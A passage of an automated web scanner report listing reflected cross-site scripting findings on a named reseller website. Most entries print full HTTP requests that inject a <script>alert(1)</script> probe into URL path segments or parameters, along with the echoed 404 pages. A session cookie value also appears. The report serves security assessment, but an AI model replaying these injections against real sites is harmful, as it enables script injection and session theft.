<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/imagese06cf<script>alert(1)</script>3401b96f7d9/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.509. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/5.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload a86e7<script>alert(1)</script>43a2edda5d4 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/ratinga86e7<script>alert(1)</script>43a2edda5d4/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/ratinga86e7<script>alert(1)</script>43a2edda5d4/5.gif was not found on this server.</p>
...[SNIP]...

2.510. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/5.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload aeaf0<script>alert(1)</script>b26a5aa798c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/rating/5.gifaeaf0<script>alert(1)</script>b26a5aa798c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/rating/5.gifaeaf0<script>alert(1)</script>b26a5aa798c was not found on this server.</p>
...[SNIP]...

2.511. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/5.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/5.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ac280<script>alert(1)</script>98052748352 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/rating/5.gif?ac280<script>alert(1)</script>98052748352=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/rating/5.gif?ac280<script>alert(1)</script>98052748352=1 was not found on this server.</p>
...[SNIP]...

2.512. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e68b8<script>alert(1)</script>8e2b062ef60 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communicatione68b8<script>alert(1)</script>8e2b062ef60/broadband/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communicatione68b8<script>alert(1)</script>8e2b062ef60/broadband/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.513. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fb685<script>alert(1)</script>76a1842f21b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadbandfb685<script>alert(1)</script>76a1842f21b/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadbandfb685<script>alert(1)</script>76a1842f21b/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.514. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 34eae<script>alert(1)</script>291a60e6b88 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes34eae<script>alert(1)</script>291a60e6b88/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes34eae<script>alert(1)</script>291a60e6b88/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.515. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 114df<script>alert(1)</script>f3281c74ddb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos114df<script>alert(1)</script>f3281c74ddb/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos114df<script>alert(1)</script>f3281c74ddb/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.516. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ae58c<script>alert(1)</script>710587e5352 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/imagesae58c<script>alert(1)</script>710587e5352/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/imagesae58c<script>alert(1)</script>710587e5352/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.517. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 6c658<script>alert(1)</script>e5dcabd2f7c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/rating6c658<script>alert(1)</script>e5dcabd2f7c/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/rating6c658<script>alert(1)</script>e5dcabd2f7c/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.518. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload e3710<script>alert(1)</script>9999576a960 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/rating/search.phpe3710<script>alert(1)</script>9999576a960?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/rating/search.phpe3710<script>alert(1)</script>9999576a960?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.519. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload d097e<a>8485135248f was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchd097e<a>8485135248f&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchd097e<a>8485135248f&opt=2 was not found on this server.</p>
...[SNIP]...

2.520. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload b26d8<a>81963b75d98 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/themes/kosmos/images/rating/search.php?keyword=search...b26d8<a>81963b75d98&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/rating/search.php?keyword=search...b26d8<a>81963b75d98&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.521. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 244d7<script>alert(1)</script>906234ef649 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&244d7<script>alert(1)</script>906234ef649=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&244d7<script>alert(1)</script>906234ef649=1 was not found on this server.</p>
...[SNIP]...

2.522. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 91464<a>929e567bcf5 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=291464<a>929e567bcf5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=291464<a>929e567bcf5 was not found on this server.</p>
...[SNIP]...

2.523. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9d706<script>alert(1)</script>b810f66498c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication9d706<script>alert(1)</script>b810f66498c/broadband/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication9d706<script>alert(1)</script>b810f66498c/broadband/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.524. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload daae1<script>alert(1)</script>0181b450c29 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadbanddaae1<script>alert(1)</script>0181b450c29/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadbanddaae1<script>alert(1)</script>0181b450c29/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.525. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 87f1e<script>alert(1)</script>e630a6a25c5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes87f1e<script>alert(1)</script>e630a6a25c5/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes87f1e<script>alert(1)</script>e630a6a25c5/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.526. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3c73d<script>alert(1)</script>424f0b105f3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos3c73d<script>alert(1)</script>424f0b105f3/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

